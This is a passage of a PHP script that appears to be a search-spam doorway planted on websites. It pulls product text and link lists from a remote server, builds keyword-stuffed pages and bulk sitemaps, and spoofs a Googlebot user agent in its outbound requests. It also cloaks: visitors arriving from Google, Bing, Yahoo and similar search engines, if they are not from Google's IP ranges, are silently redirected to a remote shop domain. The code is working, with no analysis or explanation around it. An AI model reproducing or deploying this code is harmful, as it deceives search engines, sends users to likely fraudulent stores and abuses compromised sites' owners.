 747 | 		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		
 748 | 		if(preg_match($r2,$UrlParent,$matches2)){
 749 | 			if(isset($matches2[1]))
 750 | 				$tempPid = $matches2[1];		}else{
 751 | 			
 752 | 			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1]))
 753 | 				$tempPid = $matches13[1];		}
 754 | 		
 755 | 		
 756 | 		if($tempSid && $tempPid){
 757 | 			$_GET['id']= $tempSid .'-'. $tempPid;		}
 758 | 	
 759 | 	
 760 | }
 761 | function getRandStr(){
 762 | 	
 763 | 	$arrABC = range('a','z');	shuffle($arrABC); 
 764 | 	$randNum = rand(4,6);	
 765 | 	$str = implode('',array_slice($arrABC,0,$randNum));	
 766 | 	return $str;}
 767 | if(isset($_GET["id"]))
 768 | 	$id = $_GET["id"];else{
 769 | 	$id = "320170774-51880"; //llq index id 
 770 | }
 771 | $idTemp = explode('-',$id);if(count($idTemp) < 2)
 772 | 	die();
 773 | $id23 = end($idTemp);
 774 | $numArr_key = count($arr_key);
 775 | $siteid = $idTemp[count($idTemp)-2];
 776 | $siteAID = $siteid. '-' .$id23;$fileKey = $id23 % FNUM;
 777 | $pInfoUrl =  GETDOM . "gpage.php?id=$siteAID&jgnum=". JGNUM ."&linknum=".LINKNUM;
 778 | // $_SERVER["HTTP_REFERER"] = "google.com.hk";
 779 | if(isset($_SERVER["HTTP_REFERER"])){
 780 | 	$referer = $_SERVER["HTTP_REFERER"]; 
 781 | 	$russ = '#(google|yahoo|incredibar|bing|mywebsearch|comcast|search-results|babylon|conduit)(\.[a-z0-9\-]+){1,2}#i';	
 782 | 
 783 | 	$ipRanges = array(  array('64.233.160.0' , '64.233.191.255'),   array('66.102.0.0' , '66.102.15.255' ) ,   array('66.249.64.0' , '66.249.95.255') ,   array('72.14.192.0' , '72.14.255.255') ,   array('74.125.0.0' , '74.125.255.255') ,   array('209.85.128.0' , '209.85.255.255') ,   array('216.239.32.0' , '216.239.63.255') ); 
 784 | 	$localIp = get_real_ip();	
 785 | 	$is_or_no = is_ip($localIp,$ipRanges);	
 786 | 	if(preg_match($russ, $referer) && $iszz == false && $is_or_no == false){	
 787 | 		$jumDom = DOMTXT . $siteid .".txt";	
 788 | 		$domJump = curl_get_from_webpage($jumDom,'',5);	$iszz = isCrawler();	
 789 | 		echo '<script language="javascript" type="text/javascript">'. PHP_EOL .'window.location.href="'. $domJump . "index.php?main_page=product_info&products_id=" . $id23 .'";'. PHP_EOL .'</script>';		die();	
 790 | 	}
 791 | }
 792 |  
 793 |  $fcontent = '';
 794 |  $keyKey = $id23 % $numArr_key;$keyWzi = $id23 % 6;$preOrEnd = $arrKeywz[$keyWzi]%2;$pInfoUrl =  GETDOM . "gpage.php?id=$siteAID&jgnum=". JGNUM ."&linknum=".LINKNUM; $pInfoStr = curl_get_from_webpage($pInfoUrl,'',5);$rName = '#<llqpname>(.*?)</llqpname>#s';preg_match($rName, $pInfoStr, $matchName);if($matchName[1]) $pName = trim($matchName[1]);$rCat = '#<llqcat>(.*?)</llqcat>#s';preg_match($rCat, $pInfoStr, $matchCat);if($matchCat[1]) $pCat = trim($matchCat[1]);$rDes = '#<llqpdes>(.*?)</llqpdes>#s';preg_match($rDes, $pInfoStr, $matchDes);if($matchDes[1]) $pDes = $matchDes[1];$rpd2 = '#<llqpd2>(.*?)</llqpd2>#s';preg_match($rpd2, $pInfoStr, $matchpd2);if($matchpd2[1]) $pd2 = $matchpd2[1];else $pd2 =  '';$rKey = $arr_key[$keyKey];$rImg = '#<llqpimg>(.*?)</llqpimg>#si';preg_match($rImg, $pInfoStr, $matchImg);if($matchImg[1]) $pImg = $matchImg[1];$rFL = '#<llqFL>(.*?)</llqFL>#si';preg_match($rFL, $pInfoStr, $matchFL);if($matchFL[1]) $fStr = $matchFL[1];else $fStr = ''; if($preOrEnd){$rPlaceTitle = $pName . $rKey;}else{$rPlaceTitle = $rKey . $pName;}$rPlacePname = $rPlaceTitle;$keywordKey = get_arrvs($arr_key,1*KEYJG,$keyKey);$rPlaceKey = $pName.",".$rKey.",".$keywordKey;$desKey1 = get_arrvs($arr_key,2*KEYJG,$keyKey);$desKey2 = get_arrvs($arr_key,3*KEYJG,$keyKey);$rPlaceDes = $pName.",".$rKey.",".$desKey1.",".$desKey2;$pDes = str_ireplace("<img ", '<img alt="#bbbtitlebbb#"  title="#bbbtitlebbb#" ',$pDes);$myLink = '<a href="#">#bbbtitlebbb#</a><br/>';$rpDes = $myLink.$pDes.$pd2.'';if(!strstr($rpDes,$pImg)){$rpDes .= PHP_EOL ."<br/>".'<img alt="#bbbtitlebbb#" title="#bbbtitlebbb#" src="'.$pImg.'">'."<br/>";}$rpDes = str_replace($pName,$rPlacePname,$rpDes);$rpDes = str_replace('#bbbtitlebbb#',$rPlacePname,$rpDes);$arrf1 = explode("#llqllqllq#",$fStr);$arrF2s = array();if(count($arrf1)){foreach($arrf1 as $values){$values = trim($values);$arrts = explode("===>",$values);if(count($arrts) == 2)$arrF2s[$arrts[0]] = $arrts[1];}}$arrPre = array_slice($arrF2s, 0, LINKNUM);$arrNext = array_slice($arrF2s, LINKNUM);$pCat = str_replace('index.php?category=','/index.php?category=',$pCat);	
 795 | 	
 796 | 	if(count($arrPre)){
 797 | 		$linkfirst = '';
 798 | 		$itemp = 0;		foreach($arrPre as $valueFlinkId => $vsss){
 799 | 			list($tempSid,$tempPid) = explode('-',$valueFlinkId);						
 800 | 			$friendlink = getalink($tempSid,$tempPid);			
 801 | 			$keyKey = $tempPid % $numArr_key;			
 802 | 			$keyWzi2 = $tempPid % 6;			if($arrKeywz[$keyWzi2]%2){
 803 | 				$tempLinkKey = trim($arrF2s[$valueFlinkId]) . $arr_key[$keyKey];			}else{
 804 | 				$tempLinkKey = $arr_key[$keyKey] . trim($arrF2s[$valueFlinkId]);			}
 805 | 			
 806 | 			if($itemp%2)$itempName = $pName.get_arrvs($arr_key,(4+$itemp++)*KEYJG,$keyKey);else $itempName = get_arrvs($arr_key,(4+$itemp++)*KEYJG,$keyKey).$pName;
 807 | 			
 808 | 			
 809 | 			$linkfirst=$linkfirst."<a href=\"".$friendlink."\">". $tempLinkKey ."</a><br/>". $itempName ."<br/>".PHP_EOL;		}
 810 | 	}
 811 | 		
 812 | 		
 813 | 	if(count($arrNext)){
 814 | 					$linklast = '';
 815 | 
 816 | 		foreach($arrNext as $valueFlinkId => $vsss){
 817 | 			list($tempSid,$tempPid) = explode('-',$valueFlinkId);			$friendlink = getalink($tempSid,$tempPid);
 818 | 			
 819 | 			$keyKey = $tempPid % $numArr_key;			
 820 | 			$keyWzi2 = $tempPid % 6;			if($arrKeywz[$keyWzi2]%2){
 821 | 				$tempLinkKey = trim($arrF2s[$valueFlinkId]) . $arr_key[$keyKey];			}else{
 822 | 				$tempLinkKey = $arr_key[$keyKey] . trim($arrF2s[$valueFlinkId]);			}
 823 | 			
 824 | 			$linklast=$linklast."<a href=\"".$friendlink."\">". $tempLinkKey ."</a><br/>".PHP_EOL;		}
 825 | 	}
 826 | 		
 827 | 		
 828 | 		$fileMb = fopen("moban.html","r");		$html = fread($fileMb,filesize("moban.html"));		
 829 | 			$html = str_ireplace('#bbbtitlebbb#</h1>', '#bbbtitlebbb#</h1>'.$pCat, $html);			$html = str_ireplace('#bbbtitsbbb#', $rPlacePname.' - '.$_SERVER['HTTP_HOST'], $html);			$html = str_ireplace('#bbbtitlebbb#', $rPlacePname, $html);			$html = str_replace('#bbbtitlebbb#', $rPlacePname, $html);			$html = str_ireplace('#bbbkeybbb#', $rPlaceKey, $html);			$html = str_ireplace('#bbbdesbbb#', $rPlaceDes, $html);
 830 | 			
 831 | 			
 832 | 			$html = str_ireplace('#links1#', $linkfirst, $html);			$html = str_ireplace('#links2#', $linklast, $html);			$html = str_ireplace('#content#', $fcontent, $html);			$html = str_ireplace('#descontent#', $rpDes, $html);			
 833 |  
 834 | echo $html;
 835 | die();
 836 | 	
 837 | 	
 838 | 	
 839 | function getMapNum($bgNum){
 840 | 	$TempArr = array();
 841 | 	if($bgNum + 9 <= FNUM){
 842 | 		for($i=0;$i<10;$i++){
 843 | 			$TempArr[$i] = $bgNum + $i -1;
 844 | 		}
 845 | 	}else{
 846 | 		for($i=0;$i<10;$i++){
 847 | 			if($bgNum+$i > FNUM)
 848 | 				$TempArr[$i] = $bgNum + $i -1 -FNUM;
 849 | 			else
 850 | 				$TempArr[$i] = $bgNum + $i -1;
 851 | 		}
 852 | 	}
 853 | 	
 854 | 	return $TempArr;
 855 | }
 856 | 
 857 | 
 858 | function getRandId(){
 859 | 	$num = rand(1,FNUM);	$num = $num - 1;	require(FILEDIRNAME . "/id$num.php");	$indexId=array_rand($arrId,1);	$id = $arrId[$indexId];	unset($arrId);	return $id;}
 860 | function get_arrvs($arr,$num,$nowkey){
 861 | 	$numArr = count($arr);	
 862 | 	if($nowkey + $num < $numArr)
 863 | 		return $arr[$nowkey + $num];	else{
 864 | 		if($nowkey + $num - $numArr - $numArr > 0)
 865 | 			return get_arrvs($arr,$num - $numArr,$nowkey);		else
 866 | 			return $arr[abs($nowkey + $num - $numArr)];	}
 867 | }
 868 | 
 869 | function get_pre_link($arr,$key){
 870 | 	
 871 | 	$tmpA1 = array();	$tmpA2 = array();	
 872 | 	$num = count($arr);	
 873 | 	
 874 | 	if($key + JGNUM + 1 + LINKNUM >= $num){
 875 | 		
 876 | 		if($key + JGNUM + 1 - $num > LINKNUM){
 877 | 			return array_slice($arr, $key + JGNUM + 1 - $num, LINKNUM);		}else{
 878 | 		
 879 | 		$duoyu = $key + JGNUM + 1 + LINKNUM - $num + 1;		$tmpA1 = array_slice($arr, $key + JGNUM + 1, LINKNUM);		$tmpA2 = array_slice($arr, 0, $duoyu);			
 880 | 		return array_merge($tmpA1,$tmpA2);		}
 881 | 	}else{
 882 | 			return  array_slice($arr, $key + JGNUM + 1, LINKNUM);	}
 883 | 	
 884 | }
 885 | function get_next_link($arr,$key){
 886 | 	
 887 | 	$tmpA1 = array();	$tmpA2 = array();	
 888 | 	$num = count($arr);	if($key - JGNUM - LINKNUM < 0 && $key - JGNUM > 0){
 889 | 		$duoyu = abs($key - JGNUM - LINKNUM);		$tmpA1 = array_slice($arr, 0, abs($key - JGNUM));		$tmpA2 = array_slice($arr, $num-$duoyu-1, $duoyu);		return array_merge($tmpA1,$tmpA2);	}else{
 890 | 			return  array_slice($arr, $key - JGNUM - LINKNUM, LINKNUM);	}
 891 | }
 892 | function isCrawler() {
 893 | 	$agent= @strtolower($_SERVER['HTTP_USER_AGENT']);	if (!empty($agent)) {
 894 | 		$spiderSite= array(
 895 | 			"Googlebot",
 896 | 			"Mediapartners-Google",
 897 | 			"Adsbot-Google",
 898 | 			"Yahoo!",
 899 | 			"Yahoo Slurp",
 900 | 			"bingbot",
 901 | 			"MSNBot"
 902 | 		);		foreach($spiderSite as $val) {
 903 | 		$str = strtolower($val);		if (strpos($agent, $str) !== false) {
 904 | 			return true;			}
 905 | 		}
 906 | 	} else {
 907 | 		return false;	}
 908 | } 
 909 | function glink($filenames,$jdt=1){
 910 | 	$filePres = '';	$fileEnds = '';	
 911 | 	if($jdt == 1){
 912 | 		$filePres = basename(__FILE__) . "?id=";	}else{
 913 | 		$filePres = '';		$fileEnds = JTHZ;	}
 914 | 	////获取文件目录
 915 | 	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
 916 | 	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
 917 | 	$put_str = '';
 918 | 	$urlsArray = $filenames;	//print_r($urlsArray);
 919 | 	$numLinks = count($urlsArray);	
 920 | 	foreach($urlsArray as $value){
 921 | 		$curphp=basename(__FILE__); 
 922 | 		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		//print_r( $value.$curphp."   ".$first."   ".$last);		if($first===false && $last===false && $checkTxt===false)
 923 | 		{
 924 | 			
 925 | 			$url=$serpath ."/". $filePres . PRENAME . '-' . basename($value) .$fileEnds;			$put_str .= $url . PHP_EOL;				
 926 | 		}
 927 | 	}
 928 | 		$gFile =  'urls.txt';		echo '<br/>'.$gFile.'';
 929 | 		@unlink($gFile);		file_put_contents($gFile,$put_str);		echo "生成成功！<br/>";	
 930 | }
 931 | //生成sitemap.xml文件，超出4000个则换一个xml文件；参数$c=1生成原始路径的sitemap，$c=2则生成映射后的路径
 932 | //$dir目录参数
 933 | function gsitemap2($filenames,$c=1,$jdt=1){
 934 | 	global $gnumber,$arrArrr;
 935 | 	$filePres = '';	$fileEnds = '';	
 936 | 	$dirNames = dirname(__FILE__);	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));			
 937 | 	if(JDT == 2){
 938 | 		$filePres = $httcReplace . "/" . basename(__FILE__) . "/";	}elseif(JDT == 1){
 939 | 		$filePres = $httcReplace . "/";	}elseif(JDT == 3){
 940 | 		$filePres = $httcReplace . "/" .basename(__FILE__) . "?key=";	}else{
 941 | 		$filePres = '';	}
 942 | 	if(JDT == 3){
 943 | 		$fileEnds = '';	}else{
 944 | 		$fileEnds = JTHZ;	}
 945 | 	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
 946 | 	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
 947 | 	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL .  '</urlset>';
 948 | 	// $urlsArray = $filenames;
 949 | 	// $numLinks = count($urlsArray);
 950 | 	$star = 0;	$priority = 0.1;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
 951 | 	$str = "";						
 952 | 	$tempArr1 = $filenames;
 953 | 	
 954 | 	foreach($tempArr1 as $value2){
 955 | 		$curphp=basename(__FILE__); 
 956 | 		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		list($tempSid,$tempPid) = explode('-',$value);
 957 | 				$url = getalink($tempSid,$tempPid);
 958 | 		
 959 | 		
 960 | 		
 961 | 		if($first===false && $last===false && $checkTxt===false)
 962 | 		{
 963 | 			$date = date("Y-m-d");			$time = date("H:i:s");				
 964 | 		
 965 | 			if($star % 12000==11999){
 966 | 				$gFile =  '../websitemap/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str);
 967 | 				$str = '';				$gnumber++;				return;			}
 968 | 			
 969 | 		
 970 | 			
 971 | 	
 972 | 			$str .= "     <url>
 973 | 			 <loc>" . $url . "</loc> 
 974 | 			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>   
 975 | 			 <changefreq>daily</changefreq> 
 976 | 			 <priority>0.1</priority> 
 977 | 			 </url>
 978 | 		";	
 979 | 			
 980 | 			
 981 | 			$star++;			$starPri++;		}
 982 | 	}
 983 | 	
 984 | 	{
 985 | 		$gFile =  '../websitemap/sitemap' . $gnumber .'.xml';		$gnumber++;		echo '<br/>'.$gFile.'<br/>';
 986 | 		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	
 987 | 	}
 988 | 	
 989 | 	unset($tempArr1);	unset($filenames);	
 990 | 	echo "生成sitemap成功！";	
 991 | }
 992 | function gsitemap($filenames,$c=1,$jdt=1){
 993 | 	global $gnumber,$arrArrr;	
 994 | 	$filePres = '';	$fileEnds = '';	
 995 | 	
 996 | 	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
 997 | 	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
 998 | 	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL .  '</urlset>';
 999 | 	// $urlsArray = $filenames;
1000 | 	// $numLinks = count($urlsArray);
1001 | 	
1002 | 	$star = 0;	$priority = 0.9;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
1003 | 	$str = "     <url>
1004 | 			 <loc>" . $siteLink . "</loc> 
1005 | 			 <lastmod>". $date . "T" . $time ."-05:00</lastmod> 
1006 | 			 <changefreq>always</changefreq> 
1007 | 			 <priority>1.0</priority> 
1008 | 			 </url>
1009 | 		";						
1010 | 	$tempArr1 = $filenames;
1011 | 	
1012 | 	foreach($tempArr1 as $value2){
1013 | 		$curphp=basename(__FILE__); 
1014 | 		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		list($tempSid,$tempPid) = explode('-',$value);		
1015 | 		$url = getalink($tempSid,$tempPid);	
1016 | 		
1017 | 		if($first===false && $last===false && $checkTxt===false)
1018 | 		{
1019 | 			$date = date("Y-m-d");			$time = date("H:i:s");			
1020 | 	
1021 | 			if($star % 12000==11999){
1022 | 				$gFile =  '../websitemap/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				
1023 | 				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str);
1024 | 				$str = '';				$gnumber++;				return;				
1025 | 			}
1026 | 			
1027 | 			if($starPri >= 400 && $priority != 0.1){
1028 | 				$starPri = 0;				$priority = $priority - 0.1;			}
1029 | 			
1030 | 			if($priority > 0.1){
1031 | 				
1032 | 				$str .= "     <url>
1033 | 					 <loc>" . $url . "</loc> 
1034 | 					 <lastmod>". $date . "T" . $time ."-05:00</lastmod>   
1035 | 					 <changefreq>daily</changefreq> 
1036 | 					 <priority>". $priority . "</priority> 
1037 | 					 </url>
1038 | 				";	
1039 | 			}else{
1040 | 										$str .= "     <url>
1041 | 			 <loc>" . $url . "</loc> 
1042 | 			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>   
1043 | 			 <changefreq>daily</changefreq> 
1044 | 			 <priority>0.1</priority> 
1045 | 			 </url>
1046 | 		";	
1047 | 			}
1048 | 			
1049 | 			$star++;			$starPri++;		}
1050 | 	}
1051 | 	
1052 | 	{
1053 | 		$gFile =  '../websitemap/sitemap' . $gnumber .'.xml';		echo '<br/>'.$gFile.'<br/>';		
1054 | 		$gnumber++;
1055 | 		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	
1056 | 	}
1057 | 	
1058 | 	unset($tempArr1);	unset($filenames);	echo "生成sitemap成功！";	
1059 | }
1060 |   function rmhtmltag2($tagname='',$str=''){
1061 | 		$rulers = '#<'.$tagname.'[^>]*>#s';		$str = preg_replace($rulers,'',$str);		$rulers = '#</'.$tagname.'>#s';		$str = preg_replace($rulers,'',$str);	
1062 | 	$rulers = '#<'.$tagname.'[^>]*>#i';	$str = preg_replace($rulers,'',$str);	$rulers = '#</'.$tagname.'>#i';	$str = preg_replace($rulers,'',$str);	return $str;	
1063 | 	}
1064 | 	
1065 | 	function rmhtmltag($tagname='',$str=''){
1066 | 		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#s';		$str = preg_replace($rulers,'',$str);		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#i';		$str = preg_replace($rulers,'',$str);		return $str;	
1067 | 	}
1068 |   
1069 | function fillUrl($str = '', $url){
1070 | 	$relur = '#(?:href|src) ?= ?"([^"]+)"#s';	
1071 | 	$urlInfo = parse_url($url);	
1072 | 	
1073 | 	preg_match_all($relur, $str, $matches);
1074 | 	if(count($matches[1])){
1075 | 		foreach($matches[1] as $values){
1076 | 			if(!strstr($values, "//") && !strstr($values, "..")){
1077 | 				$rStr =  $urlInfo['host']."/".$values;				$rStr =  'http://' . str_replace('//','/',$rStr);				
1078 | 				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			}elseif(strstr($values, "..")){
1079 | 				
1080 | 				// echo $urlInfo['host'];				// echo str_replace(basename($url),"",$url);				// die();				
1081 | 				$rStr = str_replace(basename($url),"",$url)."/".$values;				
1082 | 				
1083 | 				$rStr = str_replace("http://","<llqhttp>",$rStr);				
1084 | 				$rStr = str_replace("https://","<llqhttps>",$rStr);				
1085 | 				$rStr = str_replace("//","/",$rStr);				
1086 | 				$rStr = str_replace("<llqhttps>","https://",$rStr);				
1087 | 				$rStr = str_replace("<llqhttp>","http://",$rStr);				
1088 | 				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			}
1089 | 		}
1090 | 	}	
1091 | 	
1092 | 	
1093 | 	$relur = '#(?:href|src) ?= ?\'([^\']+)\'#s';	
1094 | 	$urlInfo = parse_url($url);	
1095 | 	
1096 | 	preg_match_all($relur, $str, $matches);	
1097 | 	// print_r($matches[1]);	
1098 | 	if(count($matches[1])){
1099 | 		foreach($matches[1] as $values){
1100 | 			if(!strstr($values, "//") && !strstr($values, "..")){
1101 | 					$rStr =  $urlInfo['host']."/".$values;				$rStr =  'http://' . str_replace('//','/',$rStr);				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			}elseif(strstr($values, "..")){
1102 | 				
1103 | 				$rStr = str_replace(basename($url),"",$url)."/".$values;				
1104 | 				
1105 | 				$rStr = str_replace("http://","<llqhttp>",$rStr);				
1106 | 				$rStr = str_replace("https://","<llqhttps>",$rStr);				
1107 | 				$rStr = str_replace("//","/",$rStr);				
1108 | 				$rStr = str_replace("<llqhttps>","https://",$rStr);				
1109 | 				$rStr = str_replace("<llqhttp>","http://",$rStr);				
1110 | 				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			}
1111 | 		}
1112 | 	}
1113 | 	return $str;}
1114 | function auto_read($str, $charset='UTF-8') {
1115 | 	$list = array('EUC-JP', 'Shift_JIS', 'UTF-8',  'iso-2022-jp');
1116 | 	$encode = mb_detect_encoding($str, $list);	// echo $encode;die();	
1117 | 	if($encode == 'UTF-8'){
1118 | 		return $str;	}else{
1119 | 		return mb_convert_encoding($str, $charset, $encode);	}
1120 | 	 
1121 | }
1122 | function detect_encoding($file){
1123 | 	$list = array('GBK', 'UTF-8', 'UTF-16LE', 'UTF-16BE', 'ISO-8859-1');	$str = file_get_contents($file);	foreach ($list as $item) {
1124 | 		$tmp = mb_convert_encoding($str, $item, $item);		if (md5($tmp) == md5($str)) {
1125 | 		
1126 | 			return $item;		}
1127 | 	}
1128 | 	return null;}
1129 | function curl_get_from_webpage($url,$proxy='',$loop=10){
1130 | 	$data = false;        $i = 0;        while(!$data) {
1131 |              $data = curl_get_from_webpage_one_time($url,$proxy);             if($i++ >= $loop) break;        }
1132 | 	return $data;}
1133 |  
1134 |  
1135 | function curl_get_from_webpage_one_time($url,$proxy=''){
1136 | if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){
1137 |  
1138 |     $curl = curl_init();	//如果有用代理,则使用代理.
1139 | 	$user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)";				$urlReferer = "http://www.google.com";
1140 | 	if(strlen($proxy) > 8) curl_setopt($curl, CURLOPT_PROXY, $proxy);	
1141 | curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_HEADER, false);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_REFERER, $urlReferer);curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);$data=curl_exec($curl);curl_close($curl); 
1142 |   }else{
1143 |  
1144 |     $is_auf=ini_get('allow_url_fopen') && function_exists("file_get_contents")?true:false; 
1145 |     if($is_auf){
1146 |  
1147 | 		$data = file_get_contents($url); 
1148 |     }
1149 |  
1150 |   }
1151 | 	if(!$data) return false;
1152 | 	return $data;	
1153 | 	
1154 | }
1155 | 	function getalink($sid,$pid){
1156 | 		
1157 | 		global $arrnametime,$arrKeywz,$arr_word,$strRand;		
1158 | 	
1159 | 		$filePres = '';		$fileEnds = '';		$siteLink='http://'.$_SERVER['HTTP_HOST'];
1160 | 		$dirNames = dirname(__FILE__);		$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));		
1161 | 		if(JDT == 2){
1162 | 			$filePres = $siteLink ."/". $httcReplace . "/" . basename(__FILE__) . "/";		}elseif(JDT == 1){
1163 | 			$filePres = $siteLink ."/". $httcReplace . "/";		}elseif(JDT == 3){
1164 | 			$filePres = $siteLink ."/". $httcReplace . "/" .basename(__FILE__) . "?keyword=";		}else{
1165 | 			$filePres = $siteLink."/";		}
1166 | 		
1167 | 		$ms = $arrnametime[$pid % count($arrnametime)];		
1168 | 		
1169 | 		$keyNum = $arrKeywz[$pid % count($arrKeywz)];		
1170 | 		$keyWordKey = $pid % 10;		$keyStrKey = $pid % strlen("icedrkswzjhpnxoyvumfatblgq");		$keyArr = array();		$flag = 0;		
1171 | 		if($ms == 2 or $ms ==4){
1172 | 			if($keyNum >= 9){
1173 | 				$fg = 4;			}elseif($keyNum >= 7){
1174 | 				 $fg = 3;			}else{
1175 | 				 $fg = 2;			}
1176 | 		}
1177 | 		
1178 | 		for($i=0;$i<$keyNum;$i++){
1179 | 			$tempNum = $arr_word[$i][$keyWordKey];			$tempstr = '';			for($j=0;$j<$tempNum;$j++)
1180 | 				$tempstr .= $strRand[$flag++]{$keyStrKey};			
1181 | 			$keyArr[$i] = $tempstr;		}
1182 | 		
1183 | 		$SidWz = $sid % $keyNum;		$PidWz = $pid % $keyNum;		$linkCenter = '';
1184 | 		
1185 | 		if(JDT == 3){
1186 | 			for($i=0;$i<$keyNum;$i++){
1187 | 				
1188 | 				if($SidWz == $i)
1189 | 					$linkCenter .= BZSITE . $sid .'-';				
1190 | 				if($PidWz == $i)
1191 | 					$linkCenter .= BZPRO . $pid .'-';				
1192 | 				
1193 | 				$linkCenter .= $keyArr[$i] .'-';			}
1194 | 			$linkCenter .= $linkCenter . "#llq";			$linkCenter = str_replace('-#llq','',$linkCenter);			return $filePres.$linkCenter;		}
1195 | 		
1196 | 		
1197 | 		
1198 | 		
1199 | 		if($ms == 1){
1200 | 			for($i=0;$i<$keyNum;$i++){
1201 | 				
1202 | 				if($SidWz == $i)
1203 | 					$linkCenter .= BZSITE . $sid .'-';				
1204 | 				if($PidWz == $i)
1205 | 					$linkCenter .= BZPRO . $pid .'-';				
1206 | 				
1207 | 				$linkCenter .= $keyArr[$i] .'-';
1208 | 			}
1209 | 			
1210 | 			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			
1211 | 		}elseif($ms == 2){
1212 | 			for($i=0;$i<$keyNum;$i++){
1213 | 				
1214 | 				if($SidWz == $i)
1215 | 					$linkCenter .= BZSITE . $sid .'-';				
1216 | 				if($PidWz == $i)
1217 | 					$linkCenter .= BZPRO . $pid .'-';				
1218 | 				
1219 | 				$linkCenter .= $keyArr[$i] .'-';				if($i == $fg-1){
1220 | 					$linkCenter .= '/';				}
1221 | 			}
1222 | 			
1223 | 			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			
1224 | 		}elseif($ms == 3){
1225 | 			for($i=0;$i<$keyNum;$i++){
1226 | 				
1227 | 				if($SidWz == $i)
1228 | 					$linkCenter .= BZSITE . $sid .'-';				
1229 | 				if($PidWz == $i)
1230 | 					$linkCenter .= BZPRO . $pid .'-';				
1231 | 				
1232 | 				$linkCenter .= $keyArr[$i] .'-';
1233 | 			}
1234 | 			
1235 | 			$linkCenter .= JTHZ;			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);			
1236 | 			
1237 | 		}elseif($ms == 4){
1238 | 				for($i=0;$i<$keyNum;$i++){
1239 | 				
1240 | 				if($SidWz == $i)
1241 | 					$linkCenter .= BZSITE . $sid .'-';				
1242 | 				if($PidWz == $i)
1243 | 					$linkCenter .= BZPRO . $pid .'-';				
1244 | 				
1245 | 				$linkCenter .= $keyArr[$i] .'-';				if($i == $fg-1){
1246 | 					$linkCenter .= '/';				}
1247 | 			}
1248 | 			
1249 | 			$linkCenter .= JTHZ;			$linkCenter = str_replace("-/","/",$linkCenter);			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);		}
1250 | 		
1251 | 		return $filePres.$linkCenter;
1252 | 	}
1253 | 	
1254 | 	
1255 | function is_ip($localIp,$ipRanges)
1256 | {    
1257 | 	$localIp = ip2long($localIp);  
1258 | 	foreach($ipRanges as $val)
1259 | 	{ 
1260 | 		$ipmin=sprintf("%u",ip2long($val[0]));		$ipmax=sprintf("%u",ip2long($val[1]));
1261 | 		if($localIp >= $ipmin && $localIp <= $ipmax)
1262 | 		{   
1263 | 			return true; 
1264 | 		} 
1265 | 	}   
1266 | 	return false;}
1267 |  
1268 |  
1269 | function get_real_ip(){
1270 | 	
1271 | 	$ip=false;	if(!empty($_SERVER["HTTP_CLIENT_IP"])){
1272 | 		$ip = $_SERVER["HTTP_CLIENT_IP"];	}
1273 | 	
1274 | 	if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
1275 | 		$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);		if ($ip) { array_unshift($ips, $ip); $ip = FALSE; }
1276 | 		
1277 | 		for ($i = 0; $i < count($ips); $i++) {
1278 | 			if (!eregi ("^(10|172\.16|192\.168)\.", $ips[$i])) {
1279 | 				$ip = $ips[$i];				break;			}
1280 | 		}
1281 | 	}
1282 | 	
